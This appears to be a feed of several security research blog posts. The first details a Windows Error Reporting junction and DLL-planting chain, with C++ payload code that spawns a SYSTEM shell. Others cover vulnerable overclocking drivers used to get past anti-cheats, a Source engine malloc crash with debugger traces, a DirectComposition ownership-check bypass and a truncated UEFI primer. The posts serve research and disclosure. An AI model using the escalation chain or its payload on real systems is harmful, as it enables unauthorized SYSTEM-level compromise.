Normal view

There are new articles available, click to refresh the page.
Before yesterdaysecret club

From directory deletion to SYSTEM shell

By: Jonas L
23 April 2020 at 23:00

Vulnerabilities that enable an unprivileged profile to make a service (that is running in the SYSTEM security context) delete an arbitrary directory/file are not a rare occurrence. These vulnerabilities are mostly ignored by security researchers on the hunt as there is no established path to escalation of privilege using such a primitive technique. By chance I have found such a path using an unlikely quirk in the Windows Error Reporting Service. The technical details are neither brilliant nor novel, though a writeup has been requested by several Twitter users.

Windows Error Reporting Service (WER) is responsible for collecting telemetry data when an application crashes. Over time, many vulnerabilities have been discovered in WER and if you want to find a rare specimen, it is the first place to look for it. The service is split into a usermode component and service component that communicates via COM over ALPC. Error reports are created, queued, and delivered using the file system as temporary storage.

The files are stored in subfolders at C:\ProgramData\Microsoft\Windows\WER.

  • Temp is used to store collected crash data from various sources, before they’re merged into a single file.
  • ReportQueue is used when a report is ready for delivery to Microsoft’s servers. If delivery is not possible due to throttling or missing internet connection, delivery will be attempted later and delivered when conditions allow it.
  • ReportArchive is a historic archive of delivered reports.

The NTFS permissions for the folders are chosen to allow any crashing application to deliver its data to Microsoft. Crash-specific files and folders created in subfolders may have more restrictive permissions depending on the security context of the crashed application.

The default permissions for the root folder are:

C:\ProgramData\Microsoft\Windows\WER NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)

And the subfolders:

C:\ProgramData\Microsoft\Windows\WER\ReportArchive BUILTIN\Administrators:(F)
                                                   NT AUTHORITY\SYSTEM:(F)
                                                   NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                                                   NT AUTHORITY\Authenticated Users:(OI)(CI)(R,W,D)
                                                   NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(R,W,D)
                                                   NT AUTHORITY\NETWORK SERVICE:(OI)(CI)(R,W,D)
                                                   NT AUTHORITY\SERVICE:(OI)(CI)(R,W,D)
                                                   NT AUTHORITY\WRITE RESTRICTED:(OI)(CI)(R,W,D)
                                                   APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(R,W,D)
                                                   APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(OI)(CI)(R,W,D)

C:\ProgramData\Microsoft\Windows\WER\ReportQueue BUILTIN\Administrators:(F)
                                                 NT AUTHORITY\SYSTEM:(F)
                                                 NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                                                 NT AUTHORITY\Authenticated Users:(OI)(CI)(R,W,D)
                                                 NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(R,W,D)
                                                 NT AUTHORITY\NETWORK SERVICE:(OI)(CI)(R,W,D)
                                                 NT AUTHORITY\SERVICE:(OI)(CI)(R,W,D)
                                                 NT AUTHORITY\WRITE RESTRICTED:(OI)(CI)(R,W,D)
                                                 APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(R,W,D)

C:\ProgramData\Microsoft\Windows\WER\Temp BUILTIN\Administrators:(OI)(CI)(F)
                                          NT AUTHORITY\Authenticated Users:(OI)(CI)(R,W,D)
                                          NT AUTHORITY\SERVICE:(OI)(CI)(R,W,D)
                                          NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(R,W,D)
                                          NT AUTHORITY\NETWORK SERVICE:(OI)(CI)(R,W,D)
                                          NT AUTHORITY\WRITE RESTRICTED:(OI)(CI)(R,W,D)
                                          APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(R,W,D)

The root cause enabling an arbitrary privileged directory deletion to be used for escalation of privileges is a surprising logical flow in WER. If the root folder doesn’t exist when needed for report creation it will be created - nothing surprising here. What is surprising however, is that the folder is created with the following permissions:

C:\ProgramData\Microsoft\Windows\WER BUILTIN\Administrators:(OI)(CI)(F)
                                     NT AUTHORITY\Authenticated Users:(OI)(CI)(R,W,D)
                                     NT AUTHORITY\SERVICE:(OI)(CI)(R,W,D)
                                     NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(R,W,D)
                                     NT AUTHORITY\NETWORK SERVICE:(OI)(CI)(R,W,D)
                                     NT AUTHORITY\WRITE RESTRICTED:(OI)(CI)(R,W,D)

The new permissions make it possible to make the root folder into a junction folder by an unprivileged profile. This is a scenario the service was not programmed to account for. However, even if we have a vulnerability that deletes the directory in SYSTEM security context, it would not help us much as the directory is not empty. Emptying the directory may immediately appear as impossible when the ReportArchive folder contains files owned by System with restrictive permissions, as it is often the case. But that is actually not a problem at all. What we need is the DELETE permission on the parent folder. The permissions on child files and folders are irrelevant.

A little known NTFS detail is that the rename operation can be used to move files and folders anywhere on the volume. A rename operation requires the DELETE permission on the origin and the FILE_ADD_FILE/FILE_ADD_SUBDIRECTORY permission on the destination folder. By moving all subfolders of C:\ProgramData\Microsoft\Windows\WER into another writeable location, such as C:\Windows\Temp, we bypass any restrictions on files inside the subfolders. Now the arbitrary directory delete vulnerability can be used on C:\ProgramData\Microsoft\Windows\WER with success. If the vulnerability only enables deletion of a file because NtCreateFile is called with FILE_NON_DIRECTORY_FILE, that restriction can be bypassed by making it open the path C:\ProgramData\Microsoft\Windows\WER::$INDEX_ALLOCATION.

When the folder is gone the next step is to make the WER service recreate it. That can be done by triggering the task \Microsoft\Windows\Windows Error Reporting\QueueReporting. The task is triggerable by an unprivileged profile, but executes as SYSTEM. After the task has completed we see the new, more permissive folder, but we also see the subfolders are recreated as well. To use our new FILE_WRITE_ATTRIBUTES permission on the recreated folder for making it into a junction folder, we must first make it empty (or not… but that is subject for another writeup). We repeat the move operations on the subdirectories as previously and now we can create our junction folder.

By having the junction point target the \??\c:\windows\system32\wermgr.exe.local folder, the error reporting service will create the target folder with the same permissive ACL. Every execution of wermgr.exe attempts to open the wermgr.exe.local folder, and if opened it will have the highest priority when locating ‘Side By Side (SxS)’ DLL files. If the .local folder exists, the subfolder is then attempted to be opened, and if successful Comctl32.dll is loaded from it. By crafting a payload DLL and planting it in the folder with the name comctl32.dll, it will get loaded by the LoadLibrary function in the SYSTEM security context next time the WER service starts.

When a DLL file is loaded with LoadLibrary its DllMain function gets executed by the loading process with argument ul_reason_for_call having value DLL_PROCESS_ATTACH. Continued functionality of the loading process is not a priority in this scenario. We just want to detach from the process and execute code in our own process. By spawning a command prompt we can provide visual indication of successful execution. It also enables usage of the escalated privileges as the command prompt inherits the escalated privileges. Most importantly, it detaches execution from the error reporting service so the command prompt will continue running even if the service terminates!

There is an obstacle for launching the command prompt though. The service is running in session 0. Processes running in session 0 can not create objects on the desktop, only processes in session 1 (by default) can do that.

To launch the command prompt in the current active session we can retreive the active session number using the WTSGetActiveConsoleSessionId() function. Launching the prompt can be done with the following code:

bool spawnShell() 
   STARTUPINFO startInfo = { 0x00 };
   startInfo.cb = sizeof(startInfo);
   startInfo.wShowWindow = SW_SHOW;
   startInfo.lpDesktop = const_cast<wchar_t*>( L"WinSta0\\Default" );

   PROCESS_INFORMATION procInfo = { 0x00 };

   HANDLE hToken = {};
   DWORD  sessionId = WTSGetActiveConsoleSessionId();

   OpenProcessToken( GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken );
   DuplicateTokenEx( hToken, TOKEN_ALL_ACCESS, nullptr, SecurityAnonymous, TokenPrimary, &hToken );

   SetTokenInformation(hToken, TokenSessionId, &sessionId, sizeof(sessionId));

   if (  CreateProcessAsUser( hToken,
            const_cast<wchar_t*>( L"" ),
      )  {

   return true;

The function opens the token of the current process (the service) and duplicates as a primary token (It already is, but we have to choose). The duplicated tokens session ID is then changed to the ID returned by WTSGetActiveConsoleSessionId(). By using the altered token to launch the command prompt, we get the security context of the service and execution in our session.

In my default payload, there are some extra things I like to do. Things that helps when the dll executes under more restrictive permissions. If the service is running as Local Service profile we do not have permission to change to the users session. Therefore I use the function WTSSendMessage() to create a dialog box on the active sessions desktop. That function works even when all other possibilities for creating anything on the desktop is impossible. The displayed data is also logged in the event viewer. I like to display the name of the profile we are executing as, the filename the dll is loaded as, and the the filename of the loading process. Sometimes a shell pops up because I planted a dll months before and by chance certain conditions are created where the dll gets loaded. In such cases that information is invalueable because, if the service terminates before I get a look at it, investigating why that shell popped is nearly impossible. I also like to make some beeps. Then even if everything is hidden because the computer is locked, I still get an indication that my payload executes and I can look in the event log.

One way to implement the mentioned functionality is:

#include <filesystem>   
#include <wtsapi32.h>
#include <Lmcons.h>
#include <iostream>
#include <string>
#include <Windows.h>
#include <wtsapi32.h>

#pragma comment(lib, "Wtsapi32.lib")

using namespace std;

wstring expandPath(const wchar_t* input) {
   wchar_t szEnvPath[MAX_PATH];
   ::ExpandEnvironmentStringsW(input, szEnvPath, MAX_PATH);
   return szEnvPath;

auto getUsername() {
   wchar_t usernamebuf[UNLEN + 1];
   DWORD size = UNLEN + 1;
   GetUserName((TCHAR*)usernamebuf, &size);
   static auto username = wstring{ usernamebuf };
   return username;

auto getProcessFilename() {
   wchar_t process_filenamebuf[MAX_PATH]{ 0x0000 };
   GetModuleFileName(0, process_filenamebuf, MAX_PATH);
   static auto process_filename = wstring{ process_filenamebuf };
   return process_filename;

auto getModuleFilename(HMODULE hModule = nullptr) {
   wchar_t module_filenamebuf[MAX_PATH]{ 0x0000 };
   if(hModule != nullptr) GetModuleFileName(hModule, module_filenamebuf, MAX_PATH);
   static auto module_filename = wstring{ module_filenamebuf };
   return module_filename;

bool showMessage() {
   Beep( 4000, 400 );
   Beep( 4000, 400 );
   Beep( 4000, 400 );

   auto m = L"This file:\n"s + getModuleFilename() + L"\nwas loaded by:\n"s + getProcessFilename() + L"\nrunning as:\n" + getUsername() ;
   auto message = (wchar_t*)m.c_str();
   DWORD messageAnswer{};
   WTSSendMessage( WTS_CURRENT_SERVER_HANDLE, WTSGetActiveConsoleSessionId(), (wchar_t*)L"",0 ,message ,lstrlenW(message) * 2,0 ,0 ,&messageAnswer ,true );

   return true;
static const auto init = spawnShell();
BOOL APIENTRY DllMain( HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved )
   static auto const msgshown = showMessage();

Final execution of the exploit with payload should end up looking like this:

An alternative to using the scheduled task for triggering the report submission flow is to submit an error report using the exported C function in wer.dll. If the report is submitted with the WER_SUBMIT_OUTOFPROCESS flag, the service will handle the operations needed for our purposes instead of the usermode component. Source code for submitting an error report can be seen here

Why anti-cheats block overclocking tools

By: Daax
28 April 2020 at 23:00


This is a brief informational piece for the readers that don’t come from a deep technical background regarding cheats/anti-cheats/drivers or related. It’s come to our attention that many people are wondering why certain anti-cheats block or log when a player has overclocking/tuning software open. I’ll start off by explaining why these types of software require drivers, then show a few examples of why they’re dangerous and provide information about the dangerous recycling of code that makes the end-user vulnerable. Recycling code out of convenience at the risk of your end-users is a lazy decision that can result in damage to your system. In this case, the code is recycled from sites like, OSR Online, and so on. The drivers that are used by this software are particularly problematic and would be the first targets I’d look for if I was looking to exploit a large population of people - gamers and tech enthusiasts would be a good crowd because of the tools presented below. This is by no means an exhaustive list, I’m only addressing a few drivers that are/have been exploited in cheating communities. There are dozens if not hundreds in the wild. Let’s cover the reasoning for a driver with these types of software.

Notice: We are not affiliated with game publishers or anti-cheat vendors, paid or otherwise.

Driver Requirements

Hardware monitoring/overclocking tools have been rising in popularity in the last half-decade with the growth in professional gaming, and technical requirements to run certain games. These tools query various system components like GPU, CPU, thermal sensors, and so on, however, this information isn’t easily acquired by a user. For example, to query the on-die digital temperature sensor to get temperature data for the CPU an application would need to perform a read on a model-specific register. These model-specific registers and the intrinsics to read/write them are only available when operating at a higher privilege level such as ring-0 (where drivers operate.) A model-specific register (MSR) is a type of register that is part of the x86 instruction set. As the name suggests, some registers are present on certain processors while others are not - making them model-specific. They’re primarily used for storing platform specific information, and CPU feature information; they can also be used in performance monitoring or thermal sensor monitoring. Intel decided to provide two instructions in the x86 ISA that allowed for privileged software (operating system or otherwise) to read or write model-specific registers. The instructions are rdmsr and wrmsr, and allow a privileged actor to modify or query the state of one of these registers. There is an extensive list of MSRs that are available for Intel and AMD processors that can be found in their respective SDM/APM. The significance of this is that much of the information in these MSRs should not be modified by any tasks privileged or not. There is rarely a need to do so even when writing device drivers.

Many drivers for hardware monitoring software allow an unprivileged task (in terms of privilege level, excluding Admin requirements) to read/write arbitrary MSRs. How does that work? Well, the drivers must have a mode of communication available so that they can read privileged data from an unprivileged application, and these drivers provide that interface. It’s important to reiterate that the majority of hardware monitoring/overclocking drivers that come packaged with the client application have much more, albeit unnecessary, functionality available through this communication protocol. The client application, let’s say the CPUZ desktop application, uses a Windows API function named DeviceIoControl. In the simplest sense, CPUZ calls DeviceIoControl with an IO control code that is known to the developers to perform a read of an MSR like the on-die digital temperature sensor. This isn’t an inherently dangerous thing. What’s problematic is that these drivers implement additional functionality that is outside the scope of the software and expose it through this same interface - like writing to MSRs, or physical memory.

So, if only the developers know the codes then why is it an issue? Reverse engineering is a fruitful endeavor. All an attacker has to do is get a copy of the driver, load it into their desired disassembler like IDA Pro, and look for the IOCTL handler. This is an IOCTL code in the CPUZ driver which is used to send 2 bytes out 2 different I/O ports - 0xB2 (broadcast SMI) and 0x84 (output port 4). This is interesting because you can force SMI using port 0xB2 which allows entry to System Management Mode. However, this doesn’t really accomplish anything significant it’s just interesting to note. The SMI port is primarily used for debugging.

Now, let’s take a look at a driver, shipped from Intel, that allows every operation an attacker could dream of.

Undisclosed Intel driver

This driver was packaged with a diagnostic tool created by Intel. It allows for many different operations, the most problematic is the ability for an unprivileged application to write directly to a memory page in physical memory.

Note: Unprivileged application meaning an application running at a low privilege level (ring-3), despite the requirement of Admin rights to carry out the DeviceIoControl request.

Among other things, it allows direct port IO (which is supposed to be a privileged operation) which can be abused to cause all sorts of issues on a target machine. From a malicious actor, it could be used to perform a denial-of-service by writing to an IO port that can be used to hard reset the processor.

As a diagnostic tool from Intel, the operations make some sense. However, this is a signed driver associated with a public tool and in the wrong hands could be abused to wreak havoc, in this case, on a game. The ability to read and write physical memory means that an attacker can access a game’s memory without having to do traditional things like open a handle to the process and use Windows APIs to assist in reading the virtual memory. It’s a bit of work for the attacker, but that’s never stopped any motivated individual. Well, I don’t use this diagnostic tool - so who cares? Take a look at the next two tools that use vulnerable drivers.


I’ve seen it mentioned before around different communities for overclocking, general diagnostics, and for people that don’t have enough fans in their case to prevent them from overheating. This tool carries a driver that is also quite problematic with the functionality provided. The screenshot below shows a different method of reading a portion of physical memory via MmMapIoSpace. This would be useful for an attacker to use against a game under the guise of being a trusted hardware monitoring tool. What about writing to those model-specific registers? This tool has no business writing to any MSRs yet exposes a control case where the right code allows a user to write to any model-specific register. Here’s two images of different IOCTL blocks in HWMonitor.

As a bonus, the driver that HWMonitor uses is also the driver the CPUZ uses! If an anti-cheat were to simply block HWMonitor - the application - from running the attacker could simply pull up CPUZ and have the same capabilities. This is an issue because, as mentioned earlier, model-specific registers are meant to be read/written to by system software. Exposing these registers to the user through any sort of unchecked interface gives an attacker the ability to modify system data they should otherwise not have access to. It allows attackers to circumvent protections that may be put in place by a third-party such as an anti-cheat. An anti-cheat can register callbacks such as the ExCbSeImageVerificationDriverInfo which allows the driver to get information about a loaded driver. Utilizing a trusted driver lets the attackers go undetected. Many personally signed drivers are logged/flagged/dumped by some anti-cheats and certain ones that are WHQL or from a vendor like Intel are inherently trusted. This callback is also one method anti-cheats use to prevent drivers, like the packaged driver for CPUZ, from loading; or just noting that they are present even if the name of the driver is modified.

MSI Afterburner

At this point, it’s probably clear why many of these drivers are blocked from loading by anti-cheat software. I’ll let this exploit-db page speak for MSI Afterburner. It’s just as bad as the aforementioned drivers and to preserve the integrity of the system and game it’s reasonable for anti-cheats to prevent it from loading.

These vulnerabilities have since been patched, this is merely an example of the type of behavior in many tools. While MSI responded appropriately and updated Afterburner, not all OC/monitoring tools have been updated.


It should make sense now, regardless of how unfortunate, why some anti-cheats prevent the loading of these types of drivers. I’ve seen various arguments against this tactic, but in the end, the anti-cheats job is to protect the integrity of the game and maximize the quality of gameplay. If that means you can’t run your hardware monitoring tool then you’re just going to have to shut it off to play. Cheaters in games have been using these drivers since late 2015/2016, and maybe even before that (however, the first PoC wasn’t public on a large cheating forum before then). Blocking them is necessary to ensure that the anti-cheat is not being tampered with through a trusted third-party driver and that the game is protected from hackers using this method of attack. It’s understandable that being unable to use monitoring tools is frustrating, but rather than blame the anti-cheat blame the vendors of these types of software that are recycling dangerous code and putting your system at risk regardless of the game you play. If I were an attacker, I would definitely consider using one of these many drivers to compromise a system.

A solution for some of the companies would be to simply remove the unnecessary code like mapping physical memory, writing to model-specific registers, writing to control registers, and so on. Maintaining the read-only of thermal sensors and other component related data would be much less of an issue.

This is by no means an extensive article, just a brief information piece to help players/users understand why their hardware monitoring/overclocking tools are blocked by an anti-cheat.

Source Engine Memory Corruption via LUMP_PAKFILE

By: impost0r
5 May 2020 at 23:00

A month or so ago I dropped a Source engine zero-day on Twitter without much explanation of what it does. After determining that it’s unfortunately not exploitable, we’ll be exploring it, and the mess that is Valve’s Source Engine.


Valve’s Source Engine was released initially on June 2004, with the first game utilizing the engine being Counter-Strike: Source, which was released itself on November 1, 2004 - 15 or so years ago. Despite being touted as a “complete rewrite” Source still inherits code from GoldSrc and it’s parent, the Quake Engine. Alongside the possibility of grandfathering in bugs from GoldSrc and Quake (GoldSrc itself a victim of this), Valve’s security model for the engine is… non-existent. Valve not yet being the powerhouse they are today, but we’re left with numerous stupid fucking mistakes, dude, including designing your own memory allocator (or rather, making a wrapper around malloc.).

Of note - it’s relatively common for games to develop their own allocator, but from a security perspective it’s still not the greatest.

The Bug

The byte at offset A47B98 in the .bsp file I released and the following three bytes (\x90\x90\x90\x90), parsed as UInt32, controls how much memory is allocated as the .bsp is being loaded, namely in CS:GO (though also affecting CS:S, TF2, and L4D2). That’s the short of it.

To understand more, we’re going to have to delve deeper. Recently the source code for CS:GO circa 2017’s Operation Hydra was released - this will be our main tool.

Let’s start with WinDBG. csgo.exe loaded with the arguments -safe -novid -nosound +map exploit.bsp, we hit our first chance exception at “Host_NewGame”.

---- Host_NewGame ----
(311c.4ab0): Break instruction exception - code 80000003 (first chance)
*** WARNING: Unable to verify checksum for C:\Users\triaz\Desktop\game\bin\tier0.dll
eax=00000001 ebx=00000000 ecx=7b324750 edx=00000000 esi=90909090 edi=7b324750
eip=7b2dd35c esp=012fcd68 ebp=012fce6c iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
7b2dd35c cc              int     3

On the register $esi we can see the four responsible bytes, and if we peek at the stack pointer –

Full stack trace removed for succinctness.

00 012fce6c 7b2dac51 90909090 90909090 012fd0c0 tier0!CStdMemAlloc::SetCRTAllocFailed+0x1c [cstrike15_src\tier0\memstd.cpp @ 2880] 
01 (Inline) -------- -------- -------- -------- tier0!CStdMemAlloc::InternalAlloc+0x12c [cstrike15_src\tier0\memstd.cpp @ 2043] 
02 012fce84 77643546 00000000 00000000 00000000 tier0!CStdMemAlloc::Alloc+0x131 [cstrike15_src\tier0\memstd.cpp @ 2237] 
03 (Inline) -------- -------- -------- -------- filesystem_stdio!IMemAlloc::IndirectAlloc+0x8 [cstrike15_src\public\tier0\memalloc.h @ 135] 
04 (Inline) -------- -------- -------- -------- filesystem_stdio!MemAlloc_Alloc+0xd [cstrike15_src\public\tier0\memalloc.h @ 258] 
05 (Inline) -------- -------- -------- -------- filesystem_stdio!CUtlMemory<unsigned char,int>::Init+0x44 [cstrike15_src\public\tier1\utlmemory.h @ 502] 
06 012fce98 7762c6ee 00000000 90909090 00000000 filesystem_stdio!CUtlBuffer::CUtlBuffer+0x66 [cstrike15_src\tier1\utlbuffer.cpp @ 201]

Or, in a more succinct form -

0:000> dds esp
012fcd68  90909090

The bytes of $esi are directly on the stack pointer (duh). A wonderful start. Keep in mind that module - filesystem_stdio — it’ll be important later. If we continue debugging —

***** OUT OF MEMORY! attempted allocation size: 2425393296 ****
(311c.4ab0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000032 ebx=03128f00 ecx=012fd0c0 edx=00000001 esi=012fd0c0 edi=00000000
eip=00000032 esp=012fce7c ebp=012fce88 iopl=0         nv up ei ng nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010292
00000032 ??              ???

And there we see it - the memory allocator has tried to allocate 0x90909090, as UInt32. Now while I simply used HxD to validate this, the following Python 2.7 one-liner should also function.

print int('0x90909090', 0)

(For Python 3, you’ll have to encapsulate everything from int onward in that line in another set of parentheses. RTFM.)

Which will return 2425393296, the value Source’s spaghetti code tried to allocate. (It seems, internally, Python’s int handles integers much the same way as ctypes.c_uint32 - for simplicity’s sake, we used int, but you can easily import ctypes and replicate the finding. Might want to do it with 2.7, as 3 handles some things oddly with characters, bytes, etc.)

So let’s delve a bit deeper, shall we? We would be using macOS for the next part, love it or hate it, as everyone who writes cross-platform code for the platform (and Darwin in general) seems to forget that stripping binaries is a thing - we don’t have symbols for NT, so macOS should be a viable substitute - but hey, we have the damn source code, so we can do this on Windows.


One important thing to do before we go fully into exploitation is minimize the bug. The bug is a derivative of one found with a wrapper around zzuf, that was re-found with CERT’s BFF tool. If we look at the differences between our original map (cs_assault) and ours, we can see the differences are numerous.

Diff between files

Minimization was done manually in this case, using BSPInfo and extracting and comparing the lumps. As expected, the key error was in lump 40 - LUMP_PAKFILE. This lump is essentially a large .zip file. We can use 010 Editor’s ZIP file template to examine it.

Symbols and Source (Code)

The behavior between the Steam release and the leaked source will differ significantly.

No bug will function in a completely identical way across platforms. Assuming your goal is to weaponize this, or even get the maximum payout from Valve on H1, your main target should be Win32 - though other platforms are a viable substitute. Linux has some great tooling available and Valve regularly forgets strip is a thing on macOS (so do many other developers).

We can look at the stack trace provided by WinDBG to ascertain what’s going on.

WinDBG Stack Trace

Starting from frame 8, we’ll walk through what’s happening.

The first line of each snippet will denote where WinDBG decides the problem is.

		if ( pf->Prepare( packfile->filelen, packfile->fileofs ) )
			int nIndex;
			if ( addType == PATH_ADD_TO_TAIL )
				nIndex = m_SearchPaths.AddToTail();	
				nIndex = m_SearchPaths.AddToHead();	

			CSearchPath *sp = &m_SearchPaths[ nIndex ];

			sp->SetPackFile( pf );
			sp->m_storeId = g_iNextSearchPathID++;
			sp->SetPath( g_PathIDTable.AddString( newPath ) );
			sp->m_pPathIDInfo = FindOrAddPathIDInfo( g_PathIDTable.AddString( pPathID ), -1 );

			if ( IsDvdDevPathString( newPath ) )
				sp->m_bIsDvdDevPath = true;

			pf->SetPath( sp->GetPath() );
			pf->m_lPackFileTime = GetFileTime( newPath );

			Trace_FClose( pf->m_hPackFileHandleFS );
			pf->m_hPackFileHandleFS = NULL;

			//pf->m_PackFileID = m_FileTracker2.NotePackFileOpened( pPath, pPathID, packfile->filelen );
			m_ZipFiles.AddToTail( pf );
			delete pf;

It’s worth noting that you’re reading this correctly - LUMP_PAKFILE is simply an embedded ZIP file. There’s nothing too much of consequence here - just pointing out m_ZipFiles does indeed refer to the familiar archival format.

Frame 7 is where we start to see what’s going on.

	zipDirBuff.EnsureCapacity( rec.centralDirectorySize );
	zipDirBuff.ActivateByteSwapping( IsX360() || IsPS3() );
	ReadFromPack( -1, zipDirBuff.Base(), -1, rec.centralDirectorySize, rec.startOfCentralDirOffset );
	zipDirBuff.SeekPut( CUtlBuffer::SEEK_HEAD, rec.centralDirectorySize );

If one is to open LUMP_PAKFILE in 010 Editor and parse the file as a ZIP file, you’ll see the following.

010 Editor viewing LUMP_PAKFILE as Zipfile

elDirectorySize is our rec.centralDirectorySize, in this case. Skipping forward a frame, we can see the following.

Commented out lines highlight lines of interest.

CUtlBuffer::CUtlBuffer( int growSize, int initSize, int nFlags ) : 
	m_Memory.Init( growSize, initSize );
	m_Get = 0;
	m_Put = 0;
	m_nTab = 0;
	m_nOffset = 0;
	m_Flags = nFlags;
	if ( (initSize != 0) && !IsReadOnly() )
		m_nMaxPut = -1;
		AddNullTermination( m_Put );
		m_nMaxPut = 0;

followed by the next frame,

template< class T, class I >
void CUtlMemory<T,I>::Init( int nGrowSize /*= 0*/, int nInitSize /*= 0*/ )

	m_nGrowSize = nGrowSize;
	m_nAllocationCount = nInitSize;
	Assert( nGrowSize >= 0 );
	if (m_nAllocationCount)
		m_pMemory = (T*)malloc( m_nAllocationCount * sizeof(T) );

and finally,

inline void *MemAlloc_Alloc( size_t nSize )
	return g_pMemAlloc->IndirectAlloc( nSize );

where nSize is the value we control, or $esi. Keep in mind, this is all before the actual segfault and $eip corruption. Skipping ahead to that –

***** OUT OF MEMORY! attempted allocation size: 2425393296 ****
(311c.4ab0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000032 ebx=03128f00 ecx=012fd0c0 edx=00000001 esi=012fd0c0 edi=00000000
eip=00000032 esp=012fce7c ebp=012fce88 iopl=0         nv up ei ng nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010292
00000032 ??              ???

We’re brought to the same familiar fault. Of note is that $eax and $eip are the same value, and consistent throughout runs. If we look at the stack trace WinDBG provides, we see much of the same.

WinDBG Stack Trace

Picking apart the locals from CZipPackFile::Prepare, we can see the values on $eip and $eax repeated a few times. Namely, the tuple m_PutOverflowFunc.


So we’re able to corrupt this variable and as such, control $eax and $eip - but not to any useful extent, unfortunately. These values more or less seem arbitrary based on game version and map data. What we have, essentially - is a malloc with the value of nSize (0x90909090) with full control over the variable nSize. However, it doesn’t check if it returns a valid pointer – so the game just segfaults as we’re attempting to allocate 2 GB of memory (and returning zero.) In the end, we have a novel denial of service that does result in “control” of the instruction pointer - though not to an extent that we can pop a shell, calc, or do anything fun with it.

Thanks to mev for phrasing this better than I could.

I’d like to thank mev, another one of our members, for assisting with this writeup, alongside paracord and vmcall.

Abusing DComposition to render on external windows

By: yousif
12 May 2020 at 23:00

In 2012, Microsoft introduced “DirectComposition”, a technology that helps improve performance for bitmap drawings & compositions tremendously, the way it works is that it utilizes the graphics hardware to compose & render objects, which means that it’ll run independently, aside from the main UI thread.

It can therefore be deduced that there must be a layer of interaction, or a method to apply the composition onto the desired window, or target, abusing this layer of interaction is the main target of today’s article.

The layer of interaction that DirectCompositions use, are objects called “targets” & “visuals”, every IDCompositionTarget will be created by a respective API function that depends on a window handle, and every target will depend on a IDCompositionVisual which contains the visual content represented on the screen.

If you think that you can easily just create a window, then compose on-top of another window from a non-owning process, then you’re wrong. This will cause an error, and the composition won’t be created.


Opening up win32kfull, which is the kernel-mode component for DWM, GDI & other windows features then searching for “DComposition” will yield multiple results:

The one we’re interested in is NtUserCreateDCompositionHwndTarget, according to it’s prototype: __int64 (HWND a1, int a2, _QWORD *a3), we can induce that this is simply just IDCompositionDevice::CreateTargetForHwnd, and the parameters are: (HWND hwnd, BOOL topmost, IDCompositionTarget** target).

At the very start of this function there’s a test that checks whether you can create a target for this composition or not:

last_status = TestWindowForCompositionTarget(window_handle, top_most);

This is a simplified form of that function:

NTSTATUS TestWindowForCompositionTarget(HWND window_handle, BOOL top_most)
	tagWND* window_instance = ValidateHwnd(window_handle);
	if (!window_instance 
		|| !window_instance->thread_info)
	// some checks here to verify that DCompositions are supported, and available
	PEPROCESS calling_process = IoGetCurrentProcess();
	PEPROCESS owning_process = PsGetThreadProcess(window_instance->thread_info->owning_thread); // tagWnd*->tagTHREADINFO*->KTHREAD*
	if (calling_process != owning_process)
	CHwndTargetProp target_properties{};
	if (CWindowProp::GetProp<CHwndTargetProp>(window_instance, &target_properties))
		bool unk_error = false;
		if (top_most)
			unk_error = !(target_properties.top_most_handle == nullptr);
			unk_error = !(target_properties.active_bg_handle == nullptr);
		if (unk_error)
			return (NTSTATUS)0x803e0006; // unique error code, i don't know what it's supposed to resemble

The check causing failures is if (calling_process != owning_process), this compares the caller’s process to the window’s owner process, and if this check fails they return a STATUS_ACCESS_DENIED error.

They retrieve the window’s owner process by calling ValidateHwnd, which is a function used everywhere in win32k:

This function will return a pointer to a struct of type tagWND, then access a member of type tagTHREADINFO at +0x10 (window_instance->thread_info), then access the actual thread pointer at +0x0 (thread_info->owning_thread).

One way to circumvent these checks is to swap the owning thread of the process’ window to our window temporarily, compose our target on it then swap it back very quickly, which is what the PoC is based on.

Proof Of Concept

I’ve made a PoC, that’ll hijack a window by it’s class name, then render a rectangle at it’s center. you can access the code here.

Introduction to UEFI: Part 1

26 May 2020 at 23:00

Hello, and welcome to our first article on the site! Today we will be diving into UEFI. We are aiming to provide beginners a brief first look at a few topics, including:

  1. What is UEFI?
  2. Why develop UEFI software?
  3. UEFI boot phases
  4. Getting started with developing UEFI software

What is UEFI?

Unified Extensible Firmware Interface (UEFI) is an interface that acts as the “middle-man” between the operating system and the platform firmware during the start-up process of the system. It is the successor to the BIOS and provides us with a modern alternative to the restrictive system that preceded it. The UEFI specification allows for many new features including:

  • Graphical User Interface (GUI) with mouse support
  • Support for GPT drives (including 2TB or greater drives, and more than 4 primary partitions)
  • Faster booting (depending on OS support)
  • Simplified ACPI access for power management features
  • Simplified software development compared to the arcane BIOS

As you can see, there are many compelling reasons for using UEFI over the legacy BIOS nowadays.

Why develop UEFI software?

There are many reasons as to why one would want to develop UEFI software, and today we will be mentioning a few of those reasons to hopefully inspire some of you to attempt to develop or further your knowledge in this subject.

1) Control over the boot process

One very big use case for UEFI is a boot manager such as GRUB. GRUB (GRand Unified Bootloader) is a multi-boot loader that allows a user to select the operating system they wish to boot into, whilst handling the process of selecting which OS or kernel needs to be loaded into memory. It will then transfer control to the respective OS. This is a very helpful tool, and makes use of UEFI to remove the need for manual interaction in the loading of alternative OS’s.

2) Modification of OS kernel initialization

